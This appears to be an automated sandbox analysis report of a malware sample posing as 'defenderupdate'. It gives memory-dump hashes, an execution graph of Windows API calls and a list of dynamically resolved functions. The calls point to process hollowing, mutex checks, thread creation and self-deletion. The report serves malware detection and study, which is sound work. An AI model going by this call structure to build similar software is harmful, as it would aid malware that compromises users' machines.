                                                                                                • Snapshot File: hcaresult_8_2_6a90000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8761a0248e9bb314b5678d1168f223f8f9a1110fe3adf7496748819372763236
                                                                                                • Instruction ID: 71afcc7abc1f8f6fe1d69ed6d75bc824090b05edfab14f95727522333b1d5805
                                                                                                • Opcode Fuzzy Hash: 8761a0248e9bb314b5678d1168f223f8f9a1110fe3adf7496748819372763236
                                                                                                • Instruction Fuzzy Hash: A8E01270A15225CFEBA19B24C848B99B7B0EF42315F2804E2C18AA6251C3348E80CF3A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222199984.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a90000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 93cce79f941ae7e92146ee6257b41be357b00c08a9e183ccda8074c203c735bb
                                                                                                • Instruction ID: 82c19adf2f46b80665d193ca796f9a16696cdbb1e7320dbae503739ec4199398
                                                                                                • Opcode Fuzzy Hash: 93cce79f941ae7e92146ee6257b41be357b00c08a9e183ccda8074c203c735bb
                                                                                                • Instruction Fuzzy Hash: C0D05EB0F103288FDF44EF28D948659BBF5EBC2300F1059F5900A67311DA355D458FA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1ebc917898972192301d9e495c3d26deb3488bd50832d928601018db1ab57bb2
                                                                                                • Instruction ID: 24e3aaadb71fb06289a12821b542807b8e6a2024b58a2766023afa38b026a2ab
                                                                                                • Opcode Fuzzy Hash: 1ebc917898972192301d9e495c3d26deb3488bd50832d928601018db1ab57bb2
                                                                                                • Instruction Fuzzy Hash: F6C08C39000208EFC300CB25EC09CC6BFACEF092243048198F5894B332C732E860CBE1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222199984.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a90000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 84f21b2854d7706142323471e8a4e011662f94dd56e64b655fd4c3404888a618
                                                                                                • Instruction ID: 498b0833c0d552af5b7a86281918c2d98f0b1de5648e3f52071905f1b6e62ae8
                                                                                                • Opcode Fuzzy Hash: 84f21b2854d7706142323471e8a4e011662f94dd56e64b655fd4c3404888a618
                                                                                                • Instruction Fuzzy Hash: 13D09230A402588FDB94DF24EC44B99BBB0EB41205F20D9E5940E63260CA746E888F61
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222199984.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a90000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e76237070646bc73e0466b967b20b9039f2dfbe417efb646233f572687176b0e
                                                                                                • Instruction ID: b6f1082c3e2c803ab5cfd2990bb921465bbe4bbc28de0fe88c40b4c1b0891e22
                                                                                                • Opcode Fuzzy Hash: e76237070646bc73e0466b967b20b9039f2dfbe417efb646233f572687176b0e
                                                                                                • Instruction Fuzzy Hash: EFD04874A11328CFEB90EF1AE888B99BBB1FB89210F108194E809A3244D7342D84CF00
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222199984.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a90000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 89b15831a37c085a674441d57a1e47f5e857dc599f2e6c91f2fc9cfe3c07cc06
                                                                                                • Instruction ID: 9fac1b3ea14084d94f028c2a7bf02bb2871d51829a4259c44c3abdde3a6a0b3e
                                                                                                • Opcode Fuzzy Hash: 89b15831a37c085a674441d57a1e47f5e857dc599f2e6c91f2fc9cfe3c07cc06
                                                                                                • Instruction Fuzzy Hash: 66C00276E5001A9A8B00DAD9E4508DCB774EB94321B004026D214A6104D63115268B50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                                                • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f23e976ae5e7b012dd3b601e95069de51814825f6dd13a21e02839b841e23b7c
                                                                                                • Instruction ID: e19360cf4c733fc6c9c5def2274ff063c8ea8dfa4a7ce6282351fbb0359db8cb
                                                                                                • Opcode Fuzzy Hash: f23e976ae5e7b012dd3b601e95069de51814825f6dd13a21e02839b841e23b7c
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                                                                • API String ID: 0-723292480
                                                                                                • Opcode ID: a98955a7cc8d3651ee5ff8360e8f96c44af9a44eb505fd527735e3bfbe54ee00
                                                                                                • Instruction ID: 221a666373f9d2b4ed7ab8b214ceb5601e37a30e352d54d62286cd1df8949c60
                                                                                                • Opcode Fuzzy Hash: a98955a7cc8d3651ee5ff8360e8f96c44af9a44eb505fd527735e3bfbe54ee00
                                                                                                • Instruction Fuzzy Hash: 6DD18F72A00114DFDB45DFA8C944D9ABBB2FF88310F058498E509AB276CB36ED56DF90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (_^q$(_^q$(_^q$(_^q
                                                                                                • API String ID: 0-2697572114
                                                                                                • Opcode ID: b93d262f1fea8efdbd15102cf99cd27905fb8b11c6e139fd371d2bf32e4d6d69
                                                                                                • Instruction ID: 7636fd8fd19da71ac1906c1eeba63e2a547ed5dc6267af11fae9f302f814ce43
                                                                                                • Opcode Fuzzy Hash: b93d262f1fea8efdbd15102cf99cd27905fb8b11c6e139fd371d2bf32e4d6d69
                                                                                                • Instruction Fuzzy Hash: 9C71F174B002058FCB48BF78C4545AABBB2FF8A344B1445AAD842AF362DB31DC46CB91

                                                                                                Execution Graph

                                                                                                Execution Coverage:0.6%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:4.5%
                                                                                                Total number of Nodes:418
                                                                                                Total number of Limit Nodes:20
                                                                                                execution_graph 46410 4047eb WaitForSingleObject 46411 404805 SetEvent CloseHandle 46410->46411 46412 40481c closesocket 46410->46412 46413 40489c 46411->46413 46414 404829 46412->46414 46415 40483f 46414->46415 46423 404ab1 83 API calls 46414->46423 46417 404851 WaitForSingleObject 46415->46417 46418 404892 SetEvent CloseHandle 46415->46418 46424 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46417->46424 46418->46413 46420 404860 SetEvent WaitForSingleObject 46425 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46420->46425 46422 404878 SetEvent CloseHandle CloseHandle 46422->46418 46423->46415 46424->46420 46425->46422 46426 402bcc 46427 402bd7 46426->46427 46428 402bdf 46426->46428 46444 403315 28 API calls __Getctype 46427->46444 46430 402beb 46428->46430 46434 4015d3 46428->46434 46431 402bdd 46436 43360d 46434->46436 46437 402be9 46436->46437 46440 43362e std::_Facet_Register 46436->46440 46445 43a88c 46436->46445 46452 442200 7 API calls 2 library calls 46436->46452 46439 433dec std::_Facet_Register 46454 437bd7 RaiseException 46439->46454 46440->46439 46453 437bd7 RaiseException 46440->46453 46442 433e09 46444->46431 46450 446aff _strftime 46445->46450 46446 446b3d 46456 445354 20 API calls __dosmaperr 46446->46456 46447 446b28 RtlAllocateHeap 46449 446b3b 46447->46449 46447->46450 46449->46436 46450->46446 46450->46447 46455 442200 7 API calls 2 library calls 46450->46455 46452->46436 46453->46439 46454->46442 46455->46450 46456->46449 46457 4339be 46458 4339ca ___BuildCatchObject 46457->46458 46489 4336b3 46458->46489 46460 4339d1 46461 433b24 46460->46461 46464 4339fb 46460->46464 46785 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46461->46785 46463 433b2b 46776 4426be 46463->46776 46474 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46464->46474 46779 4434d1 5 API calls _ValidateLocalCookies 46464->46779 46469 433a14 46471 433a1a 46469->46471 46780 443475 5 API calls _ValidateLocalCookies 46469->46780 46473 433a9b 46500 433c5e 46473->46500 46474->46473 46781 43edf4 35 API calls 3 library calls 46474->46781 46483 433abd 46483->46463 46484 433ac1 46483->46484 46485 433aca 46484->46485 46783 442661 28 API calls _Atexit 46484->46783 46784 433842 13 API calls 2 library calls 46485->46784 46488 433ad2 46488->46471 46490 4336bc 46489->46490 46787 433e0a IsProcessorFeaturePresent 46490->46787 46492 4336c8 46788 4379ee 10 API calls 3 library calls 46492->46788 46494 4336cd 46499 4336d1 46494->46499 46789 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46494->46789 46496 4336da 46497 4336e8 46496->46497 46790 437a17 8 API calls 3 library calls 46496->46790 46497->46460 46499->46460 46791 436050 46500->46791 46502 433c71 GetStartupInfoW 46503 433aa1 46502->46503 46504 443422 46503->46504 46792 44ddc9 46504->46792 46506 44342b 46508 433aaa 46506->46508 46796 44e0d3 35 API calls 46506->46796 46509 40d767 46508->46509 46798 41bce3 LoadLibraryA GetProcAddress 46509->46798 46511 40d783 GetModuleFileNameW 46803 40e168 32 API calls 2 library calls 46511->46803 46513 40d79f 46804 401fbd 28 API calls 46513->46804 46515 40d7ae 46805 401fbd 28 API calls 46515->46805 46517 40d7bd 46806 41afc3 28 API calls 46517->46806 46519 40d7c6 46807 40e8bd 11 API calls 46519->46807 46521 40d7cf 46808 401d8c 11 API calls 46521->46808 46523 40d7d8 46524 40d835 46523->46524 46525 40d7eb 46523->46525 46809 401d64 22 API calls 46524->46809 46824 40e986 90 API calls 46525->46824 46528 40d845 46810 401d64 22 API calls 46528->46810 46529 40d7fd 46825 401d64 22 API calls 46529->46825 46532 40d864 46811 404cbf 28 API calls 46532->46811 46534 40d809 46826 40e937 65 API calls 46534->46826 46535 40d873 46812 405ce6 28 API calls 46535->46812 46538 40d87f 46813 401eef 11 API calls 46538->46813 46539 40d824 46827 40e155 65 API calls 46539->46827 46542 40d88b 46814 401eea 11 API calls 46542->46814 46544 40d894 46815 401eea 11 API calls 46544->46815 46547 40dc9f 46782 433c94 GetModuleHandleW 46547->46782 46548 40d89d 46816 401d64 22 API calls 46548->46816 46550 40d8a6 46817 401ebd 28 API calls 46550->46817 46552 40d8b1 46818 401d64 22 API calls 46552->46818 46554 40d8ca 46819 401d64 22 API calls 46554->46819 46556 40d946 46573 40e134 46556->46573 46820 401d64 22 API calls 46556->46820 46557 40d8e5 46557->46556 46828 4085b4 28 API calls 46557->46828 46560 40d912 46829 401eef 11 API calls 46560->46829 46562 40d91e 46830 401eea 11 API calls 46562->46830 46563 40d9a4 46821 40bed7 46563->46821 46564 40d95d 46564->46563 46832 4124b7 RegOpenKeyExA RegQueryValueExA RegCloseKey 46564->46832 46567 40d927 46831 4124b7 RegOpenKeyExA RegQueryValueExA RegCloseKey 46567->46831 46568 40d9aa 46569 40d82d 46568->46569 46834 41a463 33 API calls 46568->46834 46867 401eea 11 API calls 46569->46867 46922 412902 30 API calls 46573->46922 46574 40d9c5 46577 40da18 46574->46577 46835 40697b RegOpenKeyExA RegQueryValueExA RegCloseKey 46574->46835 46575 40d988 46575->46563 46833 412902 30 API calls 46575->46833 46840 401d64 22 API calls 46577->46840 46581 40da21 46590 40da32 46581->46590 46591 40da2d 46581->46591 46582 40d9e0 46584 40d9e4 46582->46584 46585 40d9ee 46582->46585 46583 40e14a 46923 4112b5 64 API calls ___scrt_fastfail 46583->46923 46836 40699d 30 API calls 46584->46836 46838 401d64 22 API calls 46585->46838 46842 401d64 22 API calls 46590->46842 46841 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46591->46841 46592 40d9e9 46837 4064d0 97 API calls 46592->46837 46596 40da3b 46843 41ae08 28 API calls 46596->46843 46598 40d9f7 46598->46577 46601 40da13 46598->46601 46599 40da46 46844 401e18 11 API calls 46599->46844 46839 4064d0 97 API calls 46601->46839 46603 40da51 46845 401e13 11 API calls 46603->46845 46605 40da5a 46846 401d64 22 API calls 46605->46846 46607 40da63 46847 401d64 22 API calls 46607->46847 46609 40da7d 46848 401d64 22 API calls 46609->46848 46611 40da97 46849 401d64 22 API calls 46611->46849 46613 40db22 46616 40db2c 46613->46616 46621 40dcaa ___scrt_fastfail 46613->46621 46614 40dab0 46614->46613 46850 401d64 22 API calls 46614->46850 46617 40db35 46616->46617 46623 40dbb1 46616->46623 46856 401d64 22 API calls 46617->46856 46619 40db3e 46857 401d64 22 API calls 46619->46857 46620 40dac5 _wcslen 46620->46613 46851 401d64 22 API calls 46620->46851 46868 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46621->46868 46647 40dbac ___scrt_fastfail 46623->46647 46625 40db50 46858 401d64 22 API calls 46625->46858 46626 40dae0 46852 401d64 22 API calls 46626->46852 46629 40db62 46859 401d64 22 API calls 46629->46859 46631 40daf5 46853 40c89e 31 API calls 46631->46853 46632 40dcef 46869 401d64 22 API calls 46632->46869 46636 40db8b 46860 401d64 22 API calls 46636->46860 46637 40dd16 46870 401f66 28 API calls 46637->46870 46638 40db08 46854 401e18 11 API calls 46638->46854 46640 40db14 46855 401e13 11 API calls 46640->46855 46644 40db9c 46861 40bc67 45 API calls _wcslen 46644->46861 46645 40dd25 46871 4126d2 14 API calls 46645->46871 46646 40db1d 46646->46613 46647->46623 46862 4128a2 31 API calls 46647->46862 46651 40dd3b 46872 401d64 22 API calls 46651->46872 46652 40dc45 ctype 46863 401d64 22 API calls 46652->46863 46654 40dd47 46873 43a5e7 39 API calls _swprintf 46654->46873 46657 40dd54 46660 40dd81 46657->46660 46874 41beb0 86 API calls ___scrt_fastfail 46657->46874 46658 40dc5c 46658->46632 46864 401d64 22 API calls 46658->46864 46875 401f66 28 API calls 46660->46875 46661 40dc7e 46865 41ae08 28 API calls 46661->46865 46665 40dd65 CreateThread 46665->46660 46930 41c96f 10 API calls 46665->46930 46666 40dd96 46876 401f66 28 API calls 46666->46876 46667 40dc87 46866 40e219 109 API calls 46667->46866 46670 40dda5 46877 41a686 79 API calls 46670->46877 46671 40dc8c 46671->46632 46673 40dc93 46671->46673 46673->46569 46674 40ddaa 46878 401d64 22 API calls 46674->46878 46676 40ddb6 46879 401d64 22 API calls 46676->46879 46678 40ddcb 46880 401d64 22 API calls 46678->46880 46680 40ddeb 46881 43a5e7 39 API calls _swprintf 46680->46881 46682 40ddf8 46882 401d64 22 API calls 46682->46882 46684 40de03 46883 401d64 22 API calls 46684->46883 46686 40de14 46884 401d64 22 API calls 46686->46884 46688 40de29 46885 401d64 22 API calls 46688->46885 46690 40de3a 46691 40de41 StrToIntA 46690->46691 46886 409517 142 API calls _wcslen 46691->46886 46693 40de53 46887 401d64 22 API calls 46693->46887 46695 40dea1 46890 401d64 22 API calls 46695->46890 46696 40de5c 46696->46695 46888 43360d 22 API calls 3 library calls 46696->46888 46699 40de71 46889 401d64 22 API calls 46699->46889 46701 40de84 46702 40de8b CreateThread 46701->46702 46702->46695 46932 419128 102 API calls __EH_prolog 46702->46932 46703 40def9 46893 401d64 22 API calls 46703->46893 46704 40deb1 46704->46703 46891 43360d 22 API calls 3 library calls 46704->46891 46707 40dec6 46892 401d64 22 API calls 46707->46892 46709 40ded8 46714 40dedf CreateThread 46709->46714 46710 40df6c 46899 401d64 22 API calls 46710->46899 46711 40df02 46711->46710 46894 401d64 22 API calls 46711->46894 46714->46703 46931 419128 102 API calls __EH_prolog 46714->46931 46715 40df1e 46895 401d64 22 API calls 46715->46895 46716 40df75 46717 40dfba 46716->46717 46900 401d64 22 API calls 46716->46900 46904 41a7a2 29 API calls 46717->46904 46721 40df33 46896 40c854 31 API calls 46721->46896 46722 40dfc3 46905 401e18 11 API calls 46722->46905 46723 40df8a 46901 401d64 22 API calls 46723->46901 46725 40dfce 46906 401e13 11 API calls 46725->46906 46729 40df46 46897 401e18 11 API calls 46729->46897 46731 40dfd7 CreateThread 46736 40e004 46731->46736 46737 40dff8 CreateThread 46731->46737 46933 40e54f 82 API calls 46731->46933 46732 40df9f 46902 43a5e7 39 API calls _swprintf 46732->46902 46733 40df52 46898 401e13 11 API calls 46733->46898 46738 40e019 46736->46738 46739 40e00d CreateThread 46736->46739 46737->46736 46927 410f36 138 API calls 46737->46927 46743 40e073 46738->46743 46907 401f66 28 API calls 46738->46907 46739->46738 46928 411524 38 API calls ___scrt_fastfail 46739->46928 46741 40df5b CreateThread 46741->46710 46929 40196b 49 API calls 46741->46929 46742 40dfac 46903 40b95c 7 API calls 46742->46903 46912 41246e RegOpenKeyExA RegQueryValueExA RegCloseKey 46743->46912 46746 40e046 46908 404c9e 28 API calls 46746->46908 46749 40e08b 46751 40e12a 46749->46751 46913 41ae08 28 API calls 46749->46913 46750 40e053 46909 401f66 28 API calls 46750->46909 46920 40cbac 27 API calls 46751->46920 46754 40e062 46910 41a686 79 API calls 46754->46910 46756 40e12f 46921 413fd4 168 API calls 46756->46921 46757 40e0a4 46914 412584 31 API calls 46757->46914 46760 40e067 46911 401eea 11 API calls 46760->46911 46763 40e0ba 46915 401e13 11 API calls 46763->46915 46765 40e0ed DeleteFileW 46766 40e0f4 46765->46766 46767 40e0c5 46765->46767 46916 41ae08 28 API calls 46766->46916 46767->46765 46767->46766 46768 40e0db Sleep 46767->46768 46768->46767 46770 40e104 46917 41297a RegOpenKeyExW RegDeleteValueW 46770->46917 46772 40e117 46918 401e13 11 API calls 46772->46918 46774 40e121 46919 401e13 11 API calls 46774->46919 46935 44243b 46776->46935 46779->46469 46780->46474 46781->46473 46782->46483 46783->46485 46784->46488 46785->46463 46787->46492 46788->46494 46789->46496 46790->46499 46791->46502 46793 44dddb 46792->46793 46794 44ddd2 46792->46794 46793->46506 46797 44dcc8 48 API calls 5 library calls 46794->46797 46796->46506 46797->46793 46799 41bd22 LoadLibraryA GetProcAddress 46798->46799 46800 41bd12 GetModuleHandleA GetProcAddress 46798->46800 46801 41bd4b 32 API calls 46799->46801 46802 41bd3b LoadLibraryA GetProcAddress 46799->46802 46800->46799 46801->46511 46802->46801 46803->46513 46804->46515 46805->46517 46806->46519 46807->46521 46808->46523 46809->46528 46810->46532 46811->46535 46812->46538 46813->46542 46814->46544 46815->46548 46816->46550 46817->46552 46818->46554 46819->46557 46820->46564 46924 401e8f 46821->46924 46823 40bee1 CreateMutexA GetLastError 46823->46568 46824->46529 46825->46534 46826->46539 46828->46560 46829->46562 46830->46567 46831->46556 46832->46575 46833->46563 46834->46574 46835->46582 46836->46592 46837->46585 46838->46598 46839->46577 46840->46581 46841->46590 46842->46596 46843->46599 46844->46603 46845->46605 46846->46607 46847->46609 46848->46611 46849->46614 46850->46620 46851->46626 46852->46631 46853->46638 46854->46640 46855->46646 46856->46619 46857->46625 46858->46629 46859->46636 46860->46644 46861->46647 46862->46652 46863->46658 46864->46661 46865->46667 46866->46671 46867->46547 46868->46632 46869->46637 46870->46645 46871->46651 46872->46654 46873->46657 46874->46665 46875->46666 46876->46670 46877->46674 46878->46676 46879->46678 46880->46680 46881->46682 46882->46684 46883->46686 46884->46688 46885->46690 46886->46693 46887->46696 46888->46699 46889->46701 46890->46704 46891->46707 46892->46709 46893->46711 46894->46715 46895->46721 46896->46729 46897->46733 46898->46741 46899->46716 46900->46723 46901->46732 46902->46742 46903->46717 46904->46722 46905->46725 46906->46731 46907->46746 46908->46750 46909->46754 46910->46760 46911->46743 46912->46749 46913->46757 46914->46763 46915->46767 46916->46770 46917->46772 46918->46774 46919->46751 46920->46756 46926 419e89 104 API calls 46921->46926 46922->46583 46925 401e94 46924->46925 46934 411637 62 API calls 46927->46934 46936 442447 __FrameHandler3::FrameUnwindToState 46935->46936 46937 442460 46936->46937 46938 44244e 46936->46938 46959 444acc EnterCriticalSection 46937->46959 46971 442595 GetModuleHandleW 46938->46971 46941 442453 46941->46937 46972 4425d9 GetModuleHandleExW 46941->46972 46942 442505 46960 442545 46942->46960 46946 442467 46946->46942 46948 4424dc 46946->46948 46980 4431ef 20 API calls _Atexit 46946->46980 46949 4424f4 46948->46949 46981 443475 5 API calls _ValidateLocalCookies 46948->46981 46982 443475 5 API calls _ValidateLocalCookies 46949->46982 46950 442522 46963 442554 46950->46963 46951 44254e 46983 456499 5 API calls _ValidateLocalCookies 46951->46983 46959->46946 46984 444b14 LeaveCriticalSection 46960->46984 46962 44251e 46962->46950 46962->46951 46985 447973 46963->46985 46966 442582 46969 4425d9 _Atexit 8 API calls 46966->46969 46967 442562 GetPEB 46967->46966 46968 442572 GetCurrentProcess TerminateProcess 46967->46968 46968->46966 46970 44258a ExitProcess 46969->46970 46971->46941 46973 442626 46972->46973 46974 442603 GetProcAddress 46972->46974 46975 442635 46973->46975 46976 44262c FreeLibrary 46973->46976 46977 442618 46974->46977 46978 433d2c _ValidateLocalCookies 5 API calls 46975->46978 46976->46975 46977->46973 46979 44245f 46978->46979 46979->46937 46980->46948 46981->46949 46982->46942 46984->46962 46986 447998 46985->46986 46988 44798e 46985->46988 46991 447174 46986->46991 46998 433d2c 46988->46998 46990 44255e 46990->46966 46990->46967 46992 4471a0 46991->46992 46993 4471a4 46991->46993 46992->46993 46996 4471c4 46992->46996 47005 447210 46992->47005 46993->46988 46995 4471d0 GetProcAddress 46997 4471e0 __crt_fast_encode_pointer 46995->46997 46996->46993 46996->46995 46997->46993 46999 433d37 IsProcessorFeaturePresent 46998->46999 47000 433d35 46998->47000 47002 4341a4 46999->47002 47000->46990 47012 434168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47002->47012 47004 434287 47004->46990 47006 447231 LoadLibraryExW 47005->47006 47008 447226 47005->47008 47007 44724e GetLastError 47006->47007 47009 447266 47006->47009 47007->47009 47010 447259 LoadLibraryExW 47007->47010 47008->46992 47009->47008 47011 44727d FreeLibrary 47009->47011 47010->47009 47011->47008 47012->47004

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                • API String ID: 384173800-625181639
